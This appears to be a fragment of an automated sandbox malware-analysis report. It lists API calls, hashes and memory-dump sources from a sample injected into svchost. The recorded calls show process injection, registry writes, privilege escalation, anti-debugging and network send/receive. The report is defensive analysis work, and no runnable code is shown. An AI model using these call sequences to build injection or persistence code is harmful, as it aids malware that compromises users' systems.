                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 4798562a01600ef3f9dd65a926da48208d44cdd9dd444a59f9dfde149f2742bb
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 42F04CF06103B4BBDB08ABE4CD96BA976A89F0631CF100539E526D52C5E3FC8100D732
                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          • RegOpenKeyExA.KERNELBASE(80000002,-00000004,000000EA,00000000,000F003F,131433EC), ref: 1314AD6C
                                                                                                                                                                                                                                                            • Part of subcall function 13142F79: lstrlenA.KERNEL32(?,C:\Windows\system32\regedit.exe,00000103,LoadLibraryExA), ref: 13142FDC
                                                                                                                                                                                                                                                          • RegSetValueExA.ADVAPI32(131433EC,-00000004,0000002F,00000000,00000004,0000FFFE,00000004), ref: 1314AD91
                                                                                                                                                                                                                                                          • RegCloseKey.ADVAPI32(131433EC), ref: 1314AD9A
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000008.00000002.2788914206.0000000013140000.00000040.00000400.00020000.00000000.sdmp, Offset: 13140000, based on PE: true
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_8_2_13140000_svchost.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: CloseOpenValuelstrlen
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID: 2964171075-0
                                                                                                                                                                                                                                                          • Opcode ID: 51ed73a0fe790b9dd92d53e1637baf4121573ec2e986ea361f53db6b8728750e
                                                                                                                                                                                                                                                          • Instruction ID: 2255bb1203f2d937dd86bd40a46386538b46995e581dfddca6c9809dc99bbe15
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 51ed73a0fe790b9dd92d53e1637baf4121573ec2e986ea361f53db6b8728750e
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 01F0DA75740259BBF714EB94CD46FBD777CAB10748F600074E701F61D4E7B4AA049625
                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          • recv.WS2_32(00080000,00000000,?,00000000), ref: 04002038
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000008.00000002.2775645730.0000000004000000.00000040.00000400.00020000.00000000.sdmp, Offset: 04000000, based on PE: true
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_8_2_4000000_svchost.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: recv
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID: 1507349165-0
                                                                                                                                                                                                                                                          • Opcode ID: f6ef40dd27d3f64aa4c7ad3445c2614c9883f47684c4cbc294a518e6a5bd2b4f
                                                                                                                                                                                                                                                          • Instruction ID: 1490ad3c8c487522ec69c99126d549fb18974fc2434ebf29d7f8fdb6e7a3af40
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: f6ef40dd27d3f64aa4c7ad3445c2614c9883f47684c4cbc294a518e6a5bd2b4f
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 8F11E274904309EFEF54CEA8C5487AE77B8BB04304F10C59DE80567282D775AAA9EB52
                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          • wnsprintfA.SHLWAPI ref: 131507BB
                                                                                                                                                                                                                                                            • Part of subcall function 131504AE: StrStrA.SHLWAPI(00000000,131414A0,?,00000000,00000000,?,?), ref: 131504DE
                                                                                                                                                                                                                                                            • Part of subcall function 131504AE: StrStrA.SHLWAPI(00000000,131414A0,00000000), ref: 13150515
                                                                                                                                                                                                                                                            • Part of subcall function 131504AE: StrStrA.SHLWAPI(?,131414A0), ref: 13150574
                                                                                                                                                                                                                                                            • Part of subcall function 13144C1F: IsBadReadPtr.KERNEL32(00000000,00000004,00000000,00000000,131505E9,?,00000000,00000000), ref: 13144C32
                                                                                                                                                                                                                                                            • Part of subcall function 13144C1F: IsBadReadPtr.KERNEL32(00000000,00000001), ref: 13144C46
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000008.00000002.2788914206.0000000013140000.00000040.00000400.00020000.00000000.sdmp, Offset: 13140000, based on PE: true
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_8_2_13140000_svchost.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: Read$wnsprintf
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID: 4273485756-0
                                                                                                                                                                                                                                                          • Opcode ID: 587f715d70c14e100e9ad71c268c14119cab96b25ca5ae852dee6966bec19f80
                                                                                                                                                                                                                                                          • Instruction ID: 33a8e7960560101825cb704409a76993d1244b25617aa666a9cd742180f8d9c4
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 587f715d70c14e100e9ad71c268c14119cab96b25ca5ae852dee6966bec19f80
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 3EF0BE79A01218BBCF205FAACD08DCF7E6EEF826A1F148035F914A5110D6709A10DAF0
                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          • send.WS2_32(?,00000000,?,00000000), ref: 04001FD4
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000008.00000002.2775645730.0000000004000000.00000040.00000400.00020000.00000000.sdmp, Offset: 04000000, based on PE: true
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_8_2_4000000_svchost.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: send
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID: 2809346765-0
                                                                                                                                                                                                                                                          • Opcode ID: 2100ac8d9ccfc1c3ea6572966c3e8a8bfe3d9605e9b65afa06b98ac370825bd3
                                                                                                                                                                                                                                                          • Instruction ID: ddc634f8a748a6d409fac8990d55453b89dec0a0c339fcac8bf16607cd560618
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 2100ac8d9ccfc1c3ea6572966c3e8a8bfe3d9605e9b65afa06b98ac370825bd3
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 0B01FB3490830DEBEF54CFA8C884BFE77B4AF04315F108698E8156B2C0D776A655EB51
                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          • RtlAllocateHeap.NTDLL(00000008,76122E60,76122E60,00020000,13143001,00000020,00020000,76122E60,00000000), ref: 13144F81
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000008.00000002.2788914206.0000000013140000.00000040.00000400.00020000.00000000.sdmp, Offset: 13140000, based on PE: true
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_8_2_13140000_svchost.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: AllocateHeap
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID: 1279760036-0
                                                                                                                                                                                                                                                          • Opcode ID: d5a463f49cfdf1fecdaeaf2fcf4134f1256c228813accd60a4bb374119a63aea
                                                                                                                                                                                                                                                          • Instruction ID: a72fddaccd7376721e0a15476ef12468bc6283df03b55bb32d71bf56afc56138
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: d5a463f49cfdf1fecdaeaf2fcf4134f1256c228813accd60a4bb374119a63aea
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 67E02B37B4573067C521116DBC04F8FBB59DBD1B61F1A4132F500F7258DF24980042E0
                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 0400104C
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000008.00000002.2775645730.0000000004000000.00000040.00000400.00020000.00000000.sdmp, Offset: 04000000, based on PE: true
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_8_2_4000000_svchost.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: InternetOpen
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID: 2038078732-0
                                                                                                                                                                                                                                                          • Opcode ID: b84c2f3ab8dffe545ce637dc70d95fb5ca9e611fe81d9fbe675e144515fb097f
                                                                                                                                                                                                                                                          • Instruction ID: 09348433bfd61fea3343c454be9addcc65c86f6fb96e00209f97bf9dceae6fcc
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: b84c2f3ab8dffe545ce637dc70d95fb5ca9e611fe81d9fbe675e144515fb097f
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: D0E0EC71140708BBE7108F50DC4AB893B949700759F10C424BA086A1C0C2FDA9C48F84
                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                            • Part of subcall function 131453CC: GetEnvironmentVariableA.KERNEL32(-00000004,0000002B,C:\Windows\system32\regedit.exe,00000103,LoadLibraryExA), ref: 131453EC
                                                                                                                                                                                                                                                            • Part of subcall function 131453CC: PathAddBackslashA.KERNELBASE(C:\Windows\system32\regedit.exe), ref: 131453F7
                                                                                                                                                                                                                                                            • Part of subcall function 131453CC: PathAppendA.SHLWAPI(C:\Windows\system32\regedit.exe,-00000004,00000028), ref: 1314540C
                                                                                                                                                                                                                                                          • CreateFileA.KERNELBASE(00000000,80000000,00000000,00000000,00000003,00000006,00000000,1314333E,00016AF0,LoadLibraryExA,?), ref: 1314542F
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000008.00000002.2788914206.0000000013140000.00000040.00000400.00020000.00000000.sdmp, Offset: 13140000, based on PE: true
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_8_2_13140000_svchost.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: Path$AppendBackslashCreateEnvironmentFileVariable
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID: 2777513326-0
                                                                                                                                                                                                                                                          • Opcode ID: 7952064c17b72f8ec2155692ee6dcf5d87db53bcce2995ed0505b70aa40820e9
                                                                                                                                                                                                                                                          • Instruction ID: 66e39ae68a4ad776ab8cf99ca3730a67aa31f6f4521c04cb6f79f5c4211117d6
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 7952064c17b72f8ec2155692ee6dcf5d87db53bcce2995ed0505b70aa40820e9
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 56C048B9B61312BAFE2D1B319D5FF2B160C9710A02F28566CB202E9880BAD4A9108420
                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          • GetCommandLineA.KERNEL32(?,?,?,76132640,00000000,00000000), ref: 1314525F
                                                                                                                                                                                                                                                          • StrStrA.SHLWAPI(00000001,131413B4,?,?,?,76132640,00000000,00000000), ref: 13145273
                                                                                                                                                                                                                                                          • CreateProcessA.KERNEL32(00000000,1315CA60,00000000,00000000,00000000,00000004,00000000,00000000,?,?), ref: 131452AE
                                                                                                                                                                                                                                                          • VirtualAllocEx.KERNEL32(?,00000000,1314DFE7,00003000,00000040,?,?,000000C1,?,?,?,?,?,?,76132640,00000000), ref: 131452CC
                                                                                                                                                                                                                                                          • TerminateProcess.KERNEL32(?,00000000,?,?,000000C1,?,?,?,?,?,?,76132640,00000000,00000000), ref: 131452DD
                                                                                                                                                                                                                                                          • WriteProcessMemory.KERNEL32(00000000,00000000,00000000,?,76132640,?,?,000000C1,?,?,?,?,?,?,76132640,00000000), ref: 1314532F
                                                                                                                                                                                                                                                          • WriteProcessMemory.KERNEL32(00000000,00000000,00000000,?,76132640,?,?,000000C1,?,?,?,?,?,?,76132640,00000000), ref: 13145381
                                                                                                                                                                                                                                                          • CreateRemoteThread.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 131453A7
                                                                                                                                                                                                                                                          • GetLastError.KERNEL32(?,?,000000C1,?,?,?,?,?,?,76132640,00000000,00000000), ref: 131453B1
                                                                                                                                                                                                                                                          • CloseHandle.KERNEL32(00000000,?,?,000000C1,?,?,?,?,?,?,76132640,00000000,00000000), ref: 131453BA
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000008.00000002.2788914206.0000000013140000.00000040.00000400.00020000.00000000.sdmp, Offset: 13140000, based on PE: true
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_8_2_13140000_svchost.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: Process$CreateMemoryWrite$AllocCloseCommandErrorHandleLastLineRemoteTerminateThreadVirtual
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID: 3159359046-0
                                                                                                                                                                                                                                                          • Opcode ID: 1cdf0ba31d3df51b1ca675a12fdd714688cd5e20231d95114aa2ea4851b52865
                                                                                                                                                                                                                                                          • Instruction ID: 9f4360f81229b30285b795f83172b076a51dca0beb3177dc1979ede44291ec0a
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 1cdf0ba31d3df51b1ca675a12fdd714688cd5e20231d95114aa2ea4851b52865
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: CD511AB1A00249FFEB11DBA5CD84FAEBBB8EB08744F244529F905E6541E774AA40CB64
                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          • GdipAlloc.GDIPLUS(00000008,131475E5,00000000,?), ref: 1314F303
                                                                                                                                                                                                                                                          • GdipAlloc.GDIPLUS(00000008), ref: 1314F34C
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000008.00000002.2788914206.0000000013140000.00000040.00000400.00020000.00000000.sdmp, Offset: 13140000, based on PE: true
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_8_2_13140000_svchost.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: AllocGdip
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID: 1856340535-0
                                                                                                                                                                                                                                                          • Opcode ID: 90cc83d8c346803ce5d403663a43de7c397794622860fffed05550019d7aa2dd
                                                                                                                                                                                                                                                          • Instruction ID: 1b3e8c1011e641e1cdb24f2e55c5aaff6d5e64cf1874f51b9794b8ca93c75a3e
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 90cc83d8c346803ce5d403663a43de7c397794622860fffed05550019d7aa2dd
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 2751A375F44209ABDF05CFA99984AAEB7B6EFC8300F38847AE044B7240DF745A55CB60
                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000008.00000002.2788914206.0000000013140000.00000040.00000400.00020000.00000000.sdmp, Offset: 13140000, based on PE: true
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_8_2_13140000_svchost.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                          • Opcode ID: a22aa4305c2437969735b4f63c706147fcbcfb90283b6e929a72bdf4f274c3fe
                                                                                                                                                                                                                                                          • Instruction ID: 9013d5642ba9b290c7d7ccf9ccdc78394776347b157038a72ed5d1254986133d
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: a22aa4305c2437969735b4f63c706147fcbcfb90283b6e929a72bdf4f274c3fe
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 0A914972A003149FEB289F7CCC81ABE77EAFB44750F25052AF96597180DB75EC858B60
                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          • IsDebuggerPresent.KERNEL32 ref: 13153DA0
                                                                                                                                                                                                                                                          • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 13153DB5
                                                                                                                                                                                                                                                          • UnhandledExceptionFilter.KERNEL32(13142208), ref: 13153DC0
                                                                                                                                                                                                                                                          • GetCurrentProcess.KERNEL32(C0000409), ref: 13153DDC
                                                                                                                                                                                                                                                          • TerminateProcess.KERNEL32(00000000), ref: 13153DE3
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000008.00000002.2788914206.0000000013140000.00000040.00000400.00020000.00000000.sdmp, Offset: 13140000, based on PE: true
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_8_2_13140000_svchost.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID: 2579439406-0
                                                                                                                                                                                                                                                          • Opcode ID: 935675d6a9079c6f15d832578c4500ab83153b337d2e4654ff363f27782184c8
                                                                                                                                                                                                                                                          • Instruction ID: a6ec819b272d0227f2426482cb05374603522a6e20c87f3b779028f3a84bc2f0
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 935675d6a9079c6f15d832578c4500ab83153b337d2e4654ff363f27782184c8
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 7621E3B5900326EFD36ADF28D5E4A443BB8FB4970CF10842EF618C3642E3B555818FA5
                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          • OpenProcessToken.ADVAPI32(000000FF,00000028,00000000), ref: 13145171
                                                                                                                                                                                                                                                          • LookupPrivilegeValueA.ADVAPI32(00000000,-00000004,000000C0), ref: 13145196
                                                                                                                                                                                                                                                          • CloseHandle.KERNEL32(00000000), ref: 131451A3
                                                                                                                                                                                                                                                          • AdjustTokenPrivileges.ADVAPI32(00000000,00000000,?,00000010,?,1314520A), ref: 131451D5
                                                                                                                                                                                                                                                          • GetLastError.KERNEL32 ref: 131451DB
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000008.00000002.2788914206.0000000013140000.00000040.00000400.00020000.00000000.sdmp, Offset: 13140000, based on PE: true
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_8_2_13140000_svchost.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: Token$AdjustCloseErrorHandleLastLookupOpenPrivilegePrivilegesProcessValue
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID: 379965542-0
                                                                                                                                                                                                                                                          • Opcode ID: 38711aaf368b1f886249a48ed627c8ddb5286af99ca2571e7505373946fc1082
                                                                                                                                                                                                                                                          • Instruction ID: e3e4a8bb1a1ccb54afa2876179f54043ec6020984c21c5fd6df84cfc700c439a
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 38711aaf368b1f886249a48ed627c8ddb5286af99ca2571e7505373946fc1082
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: FC010CB5A50259EFEB00EFA5CD49FEEBBBCFB04709F200125E516E2190E7749A448B60
                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          • GetTimeZoneInformation.KERNEL32(?), ref: 1314736F
                                                                                                                                                                                                                                                          • GetTickCount.KERNEL32 ref: 13147382
                                                                                                                                                                                                                                                          • SystemTimeToFileTime.KERNEL32(?,?), ref: 131473AF
                                                                                                                                                                                                                                                          • wsprintfA.USER32 ref: 131473D8
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000008.00000002.2788914206.0000000013140000.00000040.00000400.00020000.00000000.sdmp, Offset: 13140000, based on PE: true
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_8_2_13140000_svchost.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: Time$CountFileInformationSystemTickZonewsprintf
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID: 3771035241-0
                                                                                                                                                                                                                                                          • Opcode ID: 0addc934ec445994fa1af9f440de5eea302fbc9d82595a5cc2f4b90946519963
                                                                                                                                                                                                                                                          • Instruction ID: f1f2e079070bfaddb8b205531e5151ff7775d2037d7413df33222f54baa3ce7c
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 0addc934ec445994fa1af9f440de5eea302fbc9d82595a5cc2f4b90946519963
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 970152B2900219AFEF18EFF4DC85DD93BADEB08258F154062F915E2154DB75E984CFA0
                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          • CoCreateInstance.OLE32(04003224,00000000,00000001,04003234,00000000,?,040015CC), ref: 040016AB
                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000008.00000002.2775645730.0000000004000000.00000040.00000400.00020000.00000000.sdmp, Offset: 04000000, based on PE: true
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_8_2_4000000_svchost.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: CreateInstance
                                                                                                                                                                                                                                                          • String ID: gzip$text
                                                                                                                                                                                                                                                          • API String ID: 542301482-3625549939
                                                                                                                                                                                                                                                          • Opcode ID: 1de7f8f95360188960a295ff8dc9034c50a2fce43bd8e08d9c5ecc968754174d
                                                                                                                                                                                                                                                          • Instruction ID: 18261a129887de51fd7dcfdc5e3ae90c862e261d2310b4e411ac436b30d8b573
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 1de7f8f95360188960a295ff8dc9034c50a2fce43bd8e08d9c5ecc968754174d
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 0131DA75A00209EFDB04DF94C894FAEB7B5FB48304F10C159E918AB290C774AA84CF90
                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          • _strcpy_s.LIBCMT ref: 13152FF9
                                                                                                                                                                                                                                                          • __invoke_watson.LIBCMT ref: 1315300A
                                                                                                                                                                                                                                                          • GetModuleFileNameA.KERNEL32(00000000,1468EFF1,00000104), ref: 13153026
                                                                                                                                                                                                                                                          • _strcpy_s.LIBCMT ref: 1315303B
                                                                                                                                                                                                                                                          • __invoke_watson.LIBCMT ref: 1315304E
                                                                                                                                                                                                                                                          • _strlen.LIBCMT ref: 13153057
                                                                                                                                                                                                                                                          • _strlen.LIBCMT ref: 13153064
                                                                                                                                                                                                                                                          • __invoke_watson.LIBCMT ref: 13153091
                                                                                                                                                                                                                                                          • _strcat_s.LIBCMT ref: 131530A4
                                                                                                                                                                                                                                                          • __invoke_watson.LIBCMT ref: 131530B5
                                                                                                                                                                                                                                                          • _strcat_s.LIBCMT ref: 131530C6
                                                                                                                                                                                                                                                          • __invoke_watson.LIBCMT ref: 131530D7
                                                                                                                                                                                                                                                          • GetStdHandle.KERNEL32(000000F4,?,?,00000000,77565DE0,00000003,13153159,000000FC,13152882,00000001,00000000,00000000,?,13152F12,?,00000001), ref: 131530F6
                                                                                                                                                                                                                                                          • _strlen.LIBCMT ref: 13153117
                                                                                                                                                                                                                                                          • WriteFile.KERNEL32(00000000,00000000,00000000,?,00000000,?,13152F12,?,00000001,?,131523E7,00000018,13156968,0000000C,13152476,?), ref: 13153121
                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000008.00000002.2788914206.0000000013140000.00000040.00000400.00020000.00000000.sdmp, Offset: 13140000, based on PE: true
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_8_2_13140000_svchost.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: __invoke_watson$_strlen$File_strcat_s_strcpy_s$HandleModuleNameWrite
                                                                                                                                                                                                                                                          • String ID: ...$<program name unknown>$Microsoft Visual C++ Runtime Library$Runtime Error!Program:
                                                                                                                                                                                                                                                          • API String ID: 1879448924-4022980321
                                                                                                                                                                                                                                                          • Opcode ID: 538c471abf18d49cd56a807553f3338373a44b15654f65f96a6d8b675c0a5cd7
                                                                                                                                                                                                                                                          • Instruction ID: ba6e887fbb9592532475eb507909b79395661962f88f6adccef41f01467c0698
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 538c471abf18d49cd56a807553f3338373a44b15654f65f96a6d8b675c0a5cd7
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 973166ABA403166BE61123798D84FAF364C9B172A5F1A0934FE75E30C2FF15E55281F2
                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          • LoadLibraryA.KERNEL32(USER32.DLL,00000000,00000000,00000314,?,?,?,1468EFD8,131530EF,1468EFD8,Microsoft Visual C++ Runtime Library,00012010), ref: 13154BD4
                                                                                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,MessageBoxA), ref: 13154BF0
                                                                                                                                                                                                                                                            • Part of subcall function 131529A0: TlsGetValue.KERNEL32(00000000,13152A15,00000000,13154BB5,00000000,00000000,00000314,?,?,?,1468EFD8,131530EF,1468EFD8,Microsoft Visual C++ Runtime Library,00012010), ref: 131529AD
                                                                                                                                                                                                                                                            • Part of subcall function 131529A0: TlsGetValue.KERNEL32(FFFFFFFF,?,?,?,1468EFD8,131530EF,1468EFD8,Microsoft Visual C++ Runtime Library,00012010), ref: 131529C4
                                                                                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,00000000), ref: 13154C0D
                                                                                                                                                                                                                                                            • Part of subcall function 131529A0: GetModuleHandleA.KERNEL32(KERNEL32.DLL,?,?,?,1468EFD8,131530EF,1468EFD8,Microsoft Visual C++ Runtime Library,00012010), ref: 131529D9
                                                                                                                                                                                                                                                            • Part of subcall function 131529A0: GetProcAddress.KERNEL32(00000000,EncodePointer), ref: 131529F4
                                                                                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,00000000), ref: 13154C22
                                                                                                                                                                                                                                                          • __invoke_watson.LIBCMT ref: 13154C43
                                                                                                                                                                                                                                                            • Part of subcall function 13152265: _memset.LIBCMT ref: 131522F1
                                                                                                                                                                                                                                                            • Part of subcall function 13152265: IsDebuggerPresent.KERNEL32(?,?,00000000), ref: 1315230F
                                                                                                                                                                                                                                                            • Part of subcall function 13152265: SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,00000000), ref: 13152319
                                                                                                                                                                                                                                                            • Part of subcall function 13152265: UnhandledExceptionFilter.KERNEL32(1468EFD8,?,?,00000000), ref: 13152323
                                                                                                                                                                                                                                                            • Part of subcall function 13152265: GetCurrentProcess.KERNEL32(C000000D,?,?,00000000), ref: 1315233E
                                                                                                                                                                                                                                                            • Part of subcall function 13152265: TerminateProcess.KERNEL32(00000000,?,?,00000000), ref: 13152345
                                                                                                                                                                                                                                                            • Part of subcall function 13152A17: TlsGetValue.KERNEL32(00000000,13153CD0,1315290D,?,?,13152F12,?,00000001,?,131523E7,00000018,13156968,0000000C,13152476,?), ref: 13152A24
